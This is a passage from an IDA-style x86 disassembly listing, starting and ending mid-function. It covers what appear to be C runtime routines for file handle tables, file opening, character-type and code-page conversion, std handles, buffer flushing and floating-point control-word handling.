jb short loc_41DB4B
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41DB4B: ; CODE XREF: sub_41DB3C+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4CA3C0[ecx*4]
mov al, [ecx+eax*8+4]
and eax, 40h
retn
sub_41DB3C endp
; ---------------------------------------------------------------------------
mov eax, ds:dword_4CA3A0
push esi
push 14h
test eax, eax
pop esi
jnz short loc_41DB76
mov eax, 200h
jmp short loc_41DB7C
; ---------------------------------------------------------------------------
loc_41DB76: ; CODE XREF: _0:0041DB6D�j
cmp eax, esi
jge short loc_41DB81
mov eax, esi
loc_41DB7C: ; CODE XREF: _0:0041DB74�j
mov ds:dword_4CA3A0, eax
loc_41DB81: ; CODE XREF: _0:0041DB78�j
push 4
push eax
call sub_41F207
pop ecx
mov ds:dword_4C9380, eax
test eax, eax
pop ecx
jnz short loc_41DBB5
push 4
push esi
mov ds:dword_4CA3A0, esi
call sub_41F207
pop ecx
mov ds:dword_4C9380, eax
test eax, eax
pop ecx
jnz short loc_41DBB5
push 1Ah
call sub_417DFA
pop ecx
loc_41DBB5: ; CODE XREF: _0:0041DB92�j _0:0041DBAB�j
xor ecx, ecx
mov eax, offset off_431A78
loc_41DBBC: ; CODE XREF: _0:0041DBD0�j
mov edx, ds:dword_4C9380
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset dword_431CF8
jl short loc_41DBBC
xor edx, edx
mov ecx, offset dword_431A88
loc_41DBD9: ; CODE XREF: _0:0041DC03�j
mov eax, edx
mov esi, edx
sar eax, 5
and esi, 1Fh
mov eax, ds:dword_4CA3C0[eax*4]
mov eax, [eax+esi*8]
cmp eax, 0FFFFFFFFh
jz short loc_41DBF6
test eax, eax
jnz short loc_41DBF9
loc_41DBF6: ; CODE XREF: _0:0041DBF0�j
or dword ptr [ecx], 0FFFFFFFFh
loc_41DBF9: ; CODE XREF: _0:0041DBF4�j
add ecx, 20h
inc edx
cmp ecx, offset dword_431AE8
jl short loc_41DBD9
pop esi
retn
; ---------------------------------------------------------------------------
loc_41DC07: ; DATA XREF: _2:00424028�o
call sub_41894C
cmp ds:byte_4C90C4, 0
jz short locret_41DC1A
jmp loc_41F2B8
; ---------------------------------------------------------------------------
locret_41DC1A: ; CODE XREF: _0:0041DC13�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC1B proc near ; CODE XREF: sub_417F58+2D4�p
; sub_417F58+6B3�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_41DC27
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41DC27: ; CODE XREF: sub_41DC1B+8�j
cmp ds:dword_4C911C, 0
jnz short loc_41DC42
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_41DC74
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41DC42: ; CODE XREF: sub_41DC1B+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push ds:dword_42F56C
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push ds:dword_4C912C
call ds:dword_422130 ; WideCharToMultiByte
test eax, eax
jz short loc_41DC74
cmp [ebp+arg_0], 0
jz short loc_41DC81
loc_41DC74: ; CODE XREF: sub_41DC1B+1E�j
; sub_41DC1B+51�j
mov ds:dword_4C9084, 2Ah
or eax, 0FFFFFFFFh
loc_41DC81: ; CODE XREF: sub_41DC1B+57�j
pop ebp
retn
sub_41DC1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC83 proc near ; CODE XREF: sub_418762+5E�p
; sub_41CC8C+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422BD0
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4C924C
xor ebx, ebx
cmp eax, ebx
jnz short loc_41DCF2
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_4228C0
push esi
call ds:dword_422028 ; GetStringTypeW
test eax, eax
jz short loc_41DCD0
mov eax, esi
jmp short loc_41DCED
; ---------------------------------------------------------------------------
loc_41DCD0: ; CODE XREF: sub_41DC83+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4325D4
push esi
push ebx
call ds:dword_42202C ; GetStringTypeA
test eax, eax
jz loc_41DDB8
push 2
pop eax
loc_41DCED: ; CODE XREF: sub_41DC83+4B�j
mov ds:dword_4C924C, eax
loc_41DCF2: ; CODE XREF: sub_41DC83+2F�j
cmp eax, 2
jnz short loc_41DD1B
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_41DD03
mov eax, ds:dword_4C911C
loc_41DD03: ; CODE XREF: sub_41DC83+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_42202C ; GetStringTypeA
jmp loc_41DDBA
; ---------------------------------------------------------------------------
loc_41DD1B: ; CODE XREF: sub_41DC83+72�j
cmp eax, 1
jnz loc_41DDB8
cmp [ebp+arg_10], ebx
jnz short loc_41DD31
mov eax, ds:dword_4C912C
mov [ebp+arg_10], eax
loc_41DD31: ; CODE XREF: sub_41DC83+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_422134 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_41DDB8
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_415500
add esp, 0Ch
jmp short loc_41DD87
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_41DD87: ; CODE XREF: sub_41DC83+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_41DDB8
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_422134 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_41DDB8
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_422028 ; GetStringTypeW
jmp short loc_41DDBA
; ---------------------------------------------------------------------------
loc_41DDB8: ; CODE XREF: sub_41DC83+61�j
; sub_41DC83+9B�j ...
xor eax, eax
loc_41DDBA: ; CODE XREF: sub_41DC83+93�j
; sub_41DC83+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41DC83 endp
; =============== S U B R O U T I N E =======================================
sub_41DDCC proc near ; CODE XREF: sub_41DFE6:loc_41E15E�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_4CA3C0
loc_41DDDB: ; CODE XREF: sub_41DDCC+48�j
mov eax, [ecx]
test eax, eax
jz short loc_41DE18
lea edx, [eax+100h]
loc_41DDE7: ; CODE XREF: sub_41DDCC+28�j
cmp eax, edx
jnb short loc_41DE07
test byte ptr [eax+4], 1
jz short loc_41DDF6
add eax, 8
jmp short loc_41DDE7
; ---------------------------------------------------------------------------
loc_41DDF6: ; CODE XREF: sub_41DDCC+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41DE5B
loc_41DE07: ; CODE XREF: sub_41DDCC+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_4CA4C0
jl short loc_41DDDB
jmp short loc_41DE5B
; ---------------------------------------------------------------------------
loc_41DE18: ; CODE XREF: sub_41DDCC+13�j
mov esi, 100h
push esi
call sub_415D2F
test eax, eax
pop ecx
jz short loc_41DE5B
add ds:dword_4CA4C0, 20h
lea ecx, ds:4CA3C0h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_41DE3E: ; CODE XREF: sub_41DDCC+88�j
cmp eax, edx
jnb short loc_41DE56
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_41DE3E
; ---------------------------------------------------------------------------
loc_41DE56: ; CODE XREF: sub_41DDCC+74�j
shl edi, 5
mov ebx, edi
loc_41DE5B: ; CODE XREF: sub_41DDCC+39�j
; sub_41DDCC+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41DDCC endp
; =============== S U B R O U T I N E =======================================
sub_41DE61 proc near ; CODE XREF: sub_41DFE6+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_4CA4C0
push edi
jnb short loc_41DEC1
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4CA3C0h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_41DEC1
cmp ds:dword_42F354, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41DEB7
sub eax, 0
jz short loc_41DEAE
dec eax
jz short loc_41DEA9
dec eax
jnz short loc_41DEB7
push ebx
push 0FFFFFFF4h
jmp short loc_41DEB1
; ---------------------------------------------------------------------------
loc_41DEA9: ; CODE XREF: sub_41DE61+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_41DEB1
; ---------------------------------------------------------------------------
loc_41DEAE: ; CODE XREF: sub_41DE61+3B�j
push ebx
push 0FFFFFFF6h
loc_41DEB1: ; CODE XREF: sub_41DE61+46�j
; sub_41DE61+4B�j
call ds:dword_422024 ; SetStdHandle
loc_41DEB7: ; CODE XREF: sub_41DE61+36�j
; sub_41DE61+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_41DED5
; ---------------------------------------------------------------------------
loc_41DEC1: ; CODE XREF: sub_41DE61+C�j
; sub_41DE61+28�j
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 9
or eax, 0FFFFFFFFh
loc_41DED5: ; CODE XREF: sub_41DE61+5E�j
pop edi
pop esi
retn
sub_41DE61 endp
; =============== S U B R O U T I N E =======================================
sub_41DED8 proc near ; CODE XREF: sub_4187D7+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, ds:dword_4CA4C0
push edi
jnb short loc_41DF3B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:4CA3C0h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41DF3B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41DF3B
cmp ds:dword_42F354, 1
jnz short loc_41DF31
xor eax, eax
sub ecx, eax
jz short loc_41DF28
dec ecx
jz short loc_41DF23
dec ecx
jnz short loc_41DF31
push eax
push 0FFFFFFF4h
jmp short loc_41DF2B
; ---------------------------------------------------------------------------
loc_41DF23: ; CODE XREF: sub_41DED8+41�j
push eax
push 0FFFFFFF5h
jmp short loc_41DF2B
; ---------------------------------------------------------------------------
loc_41DF28: ; CODE XREF: sub_41DED8+3E�j
push eax
push 0FFFFFFF6h
loc_41DF2B: ; CODE XREF: sub_41DED8+49�j
; sub_41DED8+4E�j
call ds:dword_422024 ; SetStdHandle
loc_41DF31: ; CODE XREF: sub_41DED8+38�j
; sub_41DED8+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_41DF4F
; ---------------------------------------------------------------------------
loc_41DF3B: ; CODE XREF: sub_41DED8+C�j
; sub_41DED8+2A�j ...
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 9
or eax, 0FFFFFFFFh
loc_41DF4F: ; CODE XREF: sub_41DED8+61�j
pop edi
pop esi
retn
sub_41DED8 endp
; =============== S U B R O U T I N E =======================================
sub_41DF52 proc near ; CODE XREF: sub_4187D7+32�p
; sub_4187D7+49�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4CA4C0
jnb short loc_41DF7A
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, ds:dword_4CA3C0[ecx*4]
test byte ptr [ecx+eax*8+4], 1
lea eax, [ecx+eax*8]
jz short loc_41DF7A
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41DF7A: ; CODE XREF: sub_41DF52+A�j
; sub_41DF52+23�j
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 9
or eax, 0FFFFFFFFh
retn
sub_41DF52 endp
; =============== S U B R O U T I N E =======================================
sub_41DF8F proc near ; CODE XREF: sub_4188B5+2B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4CA4C0
jnb short loc_41DFD8
mov ecx, eax
mov edx, eax
sar ecx, 5
and edx, 1Fh
mov ecx, ds:dword_4CA3C0[ecx*4]
test byte ptr [ecx+edx*8+4], 1
jz short loc_41DFD8
push eax
call sub_41DF52
pop ecx
push eax
call ds:dword_422020 ; FlushFileBuffers
test eax, eax
jnz short loc_41DFCD
call ds:dword_42206C ; RtlGetLastWin32Error
jmp short loc_41DFCF
; ---------------------------------------------------------------------------
loc_41DFCD: ; CODE XREF: sub_41DF8F+34�j
xor eax, eax
loc_41DFCF: ; CODE XREF: sub_41DF8F+3C�j
test eax, eax
jz short locret_41DFE5
mov ds:dword_4C9088, eax
loc_41DFD8: ; CODE XREF: sub_41DF8F+A�j
; sub_41DF8F+22�j
mov ds:dword_4C9084, 9
or eax, 0FFFFFFFFh
locret_41DFE5: ; CODE XREF: sub_41DF8F+42�j
retn
sub_41DF8F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DFE6 proc near ; CODE XREF: sub_418A8C+13F�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov ecx, [ebp+arg_4]
push ebx
xor ebx, ebx
push esi
test cl, 80h
push edi
mov [ebp+var_1C], 0Ch
mov [ebp+var_18], ebx
jz short loc_41E00C
mov [ebp+var_14], ebx
mov [ebp+var_1], 10h
jmp short loc_41E017
; ---------------------------------------------------------------------------
loc_41E00C: ; CODE XREF: sub_41DFE6+1B�j
and [ebp+var_1], 0
mov [ebp+var_14], 1
loc_41E017: ; CODE XREF: sub_41DFE6+24�j
mov eax, 8000h
test ecx, eax
jnz short loc_41E031
test ch, 40h
jnz short loc_41E02D
cmp ds:dword_4C9358, eax
jz short loc_41E031
loc_41E02D: ; CODE XREF: sub_41DFE6+3D�j
or [ebp+var_1], 80h
loc_41E031: ; CODE XREF: sub_41DFE6+38�j
; sub_41DFE6+45�j
push 3
mov eax, ecx
pop esi
and eax, esi
sub eax, ebx
jz short loc_41E069
dec eax
jz short loc_41E060
dec eax
jz short loc_41E057
loc_41E042: ; CODE XREF: sub_41DFE6+9F�j
; sub_41DFE6+E8�j ...
mov ds:dword_4C9084, 16h
mov ds:dword_4C9088, ebx
jmp loc_41E27C
; ---------------------------------------------------------------------------
loc_41E057: ; CODE XREF: sub_41DFE6+5A�j
mov [ebp+var_C], 0C0000000h
jmp short loc_41E070
; ---------------------------------------------------------------------------
loc_41E060: ; CODE XREF: sub_41DFE6+57�j
mov [ebp+var_C], 40000000h
jmp short loc_41E070
; ---------------------------------------------------------------------------
loc_41E069: ; CODE XREF: sub_41DFE6+54�j
mov [ebp+var_C], 80000000h
loc_41E070: ; CODE XREF: sub_41DFE6+78�j
; sub_41DFE6+81�j
mov eax, [ebp+arg_8]
cmp eax, 10h
jz short loc_41E09E
cmp eax, 20h
jz short loc_41E095
cmp eax, 30h
jz short loc_41E08C
cmp eax, 40h
jnz short loc_41E042
mov [ebp+var_10], esi
jmp short loc_41E0A1
; ---------------------------------------------------------------------------
loc_41E08C: ; CODE XREF: sub_41DFE6+9A�j
mov [ebp+var_10], 2
jmp short loc_41E0A1
; ---------------------------------------------------------------------------
loc_41E095: ; CODE XREF: sub_41DFE6+95�j
mov [ebp+var_10], 1
jmp short loc_41E0A1
; ---------------------------------------------------------------------------
loc_41E09E: ; CODE XREF: sub_41DFE6+90�j
mov [ebp+var_10], ebx
loc_41E0A1: ; CODE XREF: sub_41DFE6+A4�j
; sub_41DFE6+AD�j ...
mov edx, 700h
mov eax, 400h
and ecx, edx
mov edi, 100h
cmp ecx, eax
jg short loc_41E0EB
jz short loc_41E0E6
cmp ecx, ebx
jz short loc_41E0E6
cmp ecx, edi
jz short loc_41E0DD
cmp ecx, 200h
jz short loc_41E104
cmp ecx, 300h
jnz loc_41E042
mov [ebp+var_8], 2
jmp short loc_41E114
; ---------------------------------------------------------------------------
loc_41E0DD: ; CODE XREF: sub_41DFE6+D8�j
mov [ebp+var_8], 4
jmp short loc_41E114
; ---------------------------------------------------------------------------
loc_41E0E6: ; CODE XREF: sub_41DFE6+D0�j
; sub_41DFE6+D4�j
mov [ebp+var_8], esi
jmp short loc_41E114
; ---------------------------------------------------------------------------
loc_41E0EB: ; CODE XREF: sub_41DFE6+CE�j
cmp ecx, 500h
jz short loc_41E10D
cmp ecx, 600h
jz short loc_41E104
cmp ecx, edx
jz short loc_41E10D
jmp loc_41E042
; ---------------------------------------------------------------------------
loc_41E104: ; CODE XREF: sub_41DFE6+E0�j
; sub_41DFE6+113�j
mov [ebp+var_8], 5
jmp short loc_41E114
; ---------------------------------------------------------------------------
loc_41E10D: ; CODE XREF: sub_41DFE6+10B�j
; sub_41DFE6+117�j
mov [ebp+var_8], 1
loc_41E114: ; CODE XREF: sub_41DFE6+F5�j
; sub_41DFE6+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_41E133
mov ecx, ds:dword_4C908C
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_41E133
push 1
pop esi
loc_41E133: ; CODE XREF: sub_41DFE6+138�j
; sub_41DFE6+148�j
test al, 40h
jz short loc_41E141
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_41E141: ; CODE XREF: sub_41DFE6+14F�j
test ah, 10h
jz short loc_41E148
or esi, edi
loc_41E148: ; CODE XREF: sub_41DFE6+15E�j
test al, 20h
jz short loc_41E154
or esi, 8000000h
jmp short loc_41E15E
; ---------------------------------------------------------------------------
loc_41E154: ; CODE XREF: sub_41DFE6+164�j
test al, 10h
jz short loc_41E15E
or esi, 10000000h
loc_41E15E: ; CODE XREF: sub_41DFE6+16C�j
; sub_41DFE6+170�j
call sub_41DDCC
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_41E17F
and ds:dword_4C9088, 0
mov ds:dword_4C9084, 18h
jmp short loc_41E1BD
; ---------------------------------------------------------------------------
loc_41E17F: ; CODE XREF: sub_41DFE6+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
call ds:off_42207C
mov esi, eax
cmp esi, edi
jz short loc_41E1B0
push esi
call ds:dword_422030 ; GetFileType
test eax, eax
jnz short loc_41E1C4
push esi
call ds:off_422074
loc_41E1B0: ; CODE XREF: sub_41DFE6+1B6�j
call ds:dword_42206C ; RtlGetLastWin32Error
push eax
call sub_41D064
pop ecx
loc_41E1BD: ; CODE XREF: sub_41DFE6+197�j
mov eax, edi
jmp loc_41E29A
; ---------------------------------------------------------------------------
loc_41E1C4: ; CODE XREF: sub_41DFE6+1C1�j
cmp eax, 2
jnz short loc_41E1CF
or [ebp+var_1], 40h
jmp short loc_41E1D8
; ---------------------------------------------------------------------------
loc_41E1CF: ; CODE XREF: sub_41DFE6+1E1�j
cmp eax, 3
jnz short loc_41E1D8
or [ebp+var_1], 8
loc_41E1D8: ; CODE XREF: sub_41DFE6+1E7�j
; sub_41DFE6+1EC�j
push esi
push ebx
call sub_41DE61
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:4CA3C0h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_41E281
test al, 80h
jz short loc_41E281
test byte ptr [ebp+arg_4], 2
jz short loc_41E281
push 2
push 0FFFFFFFFh
push ebx
call sub_41C637
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41E236
cmp ds:dword_4C9088, 83h
jz short loc_41E281
jmp short loc_41E275
; ---------------------------------------------------------------------------
loc_41E236: ; CODE XREF: sub_41DFE6+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41C441
add esp, 0Ch
test eax, eax
jnz short loc_41E263
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_41E263
push [ebp+var_10]
push ebx
call sub_41F310
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E275
loc_41E263: ; CODE XREF: sub_41DFE6+265�j
; sub_41DFE6+26B�j
push 0
push 0
push ebx
call sub_41C637
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41E281
loc_41E275: ; CODE XREF: sub_41DFE6+24E�j
; sub_41DFE6+27B�j
push ebx
call sub_4187D7
pop ecx
loc_41E27C: ; CODE XREF: sub_41DFE6+6C�j
or eax, 0FFFFFFFFh
jmp short loc_41E29A
; ---------------------------------------------------------------------------
loc_41E281: ; CODE XREF: sub_41DFE6+221�j
; sub_41DFE6+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41E298
test byte ptr [ebp+arg_4], 8
jz short loc_41E298
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_41E298: ; CODE XREF: sub_41DFE6+29F�j
; sub_41DFE6+2A5�j
mov eax, ebx
loc_41E29A: ; CODE XREF: sub_41DFE6+1D9�j
; sub_41DFE6+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DFE6 endp
; =============== S U B R O U T I N E =======================================
sub_41E29F proc near ; CODE XREF: sub_41A62A+52�p
xor eax, eax
retn
sub_41E29F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E2A2 proc near ; CODE XREF: sub_41E2D7+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_41E2ED
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_41E37F
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_41E2A2 endp
; =============== S U B R O U T I N E =======================================
sub_41E2D7 proc near ; CODE XREF: sub_41A916+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_41E2A2
pop ecx
pop ecx
retn
sub_41E2D7 endp
; =============== S U B R O U T I N E =======================================
sub_41E2ED proc near ; CODE XREF: sub_41E2A2+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_41E2FE
push 10h
pop eax
loc_41E2FE: ; CODE XREF: sub_41E2ED+C�j
test bl, 4
jz short loc_41E305
or al, 8
loc_41E305: ; CODE XREF: sub_41E2ED+14�j
test bl, 8
jz short loc_41E30C
or al, 4
loc_41E30C: ; CODE XREF: sub_41E2ED+1B�j
test bl, 10h
jz short loc_41E313
or al, 2
loc_41E313: ; CODE XREF: sub_41E2ED+22�j
test bl, 20h
jz short loc_41E31A
or al, 1
loc_41E31A: ; CODE XREF: sub_41E2ED+29�j
test bl, 2
jz short loc_41E324
or eax, 80000h
loc_41E324: ; CODE XREF: sub_41E2ED+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_41E35C
cmp edx, 400h
jz short loc_41E359
cmp edx, 800h
jz short loc_41E355
cmp edx, esi
jnz short loc_41E35C
or eax, edi
jmp short loc_41E35C
; ---------------------------------------------------------------------------
loc_41E355: ; CODE XREF: sub_41E2ED+5E�j
or eax, ebp
jmp short loc_41E35C
; ---------------------------------------------------------------------------
loc_41E359: ; CODE XREF: sub_41E2ED+56�j
or ah, 1
loc_41E35C: ; CODE XREF: sub_41E2ED+4E�j
; sub_41E2ED+62�j ...
and ecx, edi
pop esi
jz short loc_41E36C
cmp ecx, ebp
jnz short loc_41E371
or eax, 10000h
jmp short loc_41E371
; ---------------------------------------------------------------------------
loc_41E36C: ; CODE XREF: sub_41E2ED+72�j
or eax, 20000h
loc_41E371: ; CODE XREF: sub_41E2ED+76�j
; sub_41E2ED+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_41E37E
or eax, 40000h
locret_41E37E: ; CODE XREF: sub_41E2ED+8A�j
retn
sub_41E2ED endp
; =============== S U B R O U T I N E =======================================
sub_41E37F proc near ; CODE XREF: sub_41E2A2+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_41E38F
push 1
pop eax
loc_41E38F: ; CODE XREF: sub_41E37F+B�j
test bl, 8
jz short loc_41E396
or al, 4
loc_41E396: ; CODE XREF: sub_41E37F+13�j
test bl, 4
jz short loc_41E39D
or al, 8
loc_41E39D: ; CODE XREF: sub_41E37F+1A�j
test bl, 2
jz short loc_41E3A4
or al, 10h
loc_41E3A4: ; CODE XREF: sub_41E37F+21�j
test bl, 1
jz short loc_41E3AB
or al, 20h
loc_41E3AB: ; CODE XREF: sub_41E37F+28�j
test ebx, 80000h
jz short loc_41E3B5
or al, 2
loc_41E3B5: ; CODE XREF: sub_41E37F+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_41E3E2
cmp ecx, 100h
jz short loc_41E3DF
cmp ecx, esi
jz short loc_41E3DA
cmp ecx, edx
jnz short loc_41E3E2
or ah, 0Ch
jmp short loc_41E3E2
; ---------------------------------------------------------------------------
loc_41E3DA: ; CODE XREF: sub_41E37F+50�j
or ah, 8
jmp short loc_41E3E2
; ---------------------------------------------------------------------------
loc_41E3DF: ; CODE XREF: sub_41E37F+4C�j
or ah, 4
loc_41E3E2: ; CODE XREF: sub_41E37F+44�j
; sub_41E37F+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_41E3F8
cmp ecx, 10000h
jnz short loc_41E3FA
or eax, esi
jmp short loc_41E3FA
; ---------------------------------------------------------------------------
loc_41E3F8: ; CODE XREF: sub_41E37F+6B�j
or eax, edx
loc_41E3FA: ; CODE XREF: sub_41E37F+73�j
; sub_41E37F+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_41E407
or ah, 10h
locret_41E407: ; CODE XREF: sub_41E37F+83�j
retn
sub_41E37F endp
; =============== S U B R O U T I N E =======================================
sub_41E408 proc near ; CODE XREF: sub_41E4A7+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_41E44D
inc esi
cmp esi, 3
jge short loc_41E448
lea eax, [eax+esi*4]
loc_41E43A: ; CODE XREF: sub_41E408+3E�j
cmp dword ptr [eax], 0
jnz short loc_41E44D
inc esi
add eax, 4
cmp esi, 3
jl short loc_41E43A
loc_41E448: ; CODE XREF: sub_41E408+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E44D: ; CODE XREF: sub_41E408+27�j
; sub_41E408+35�j
xor eax, eax
pop esi
retn
sub_41E408 endp
; =============== S U B R O U T I N E =======================================
sub_41E451 proc near ; CODE XREF: sub_41E4A7+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
